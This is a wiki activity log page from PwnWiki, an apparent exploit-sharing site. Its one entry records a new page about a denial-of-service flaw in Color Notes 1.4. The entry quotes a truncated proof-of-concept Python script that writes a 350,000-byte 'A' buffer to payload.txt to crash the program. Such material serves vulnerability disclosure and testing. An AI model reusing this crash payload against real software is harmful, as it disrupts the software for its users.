All public logs
From PwnWiki
Combined display of all available logs of PwnWiki. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 20:02, 4 June 2021 Pwnwiki talk contribs created page Color Notes 1.4 拒絕服務漏洞 (Created page with "==POC== <pre> #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be...")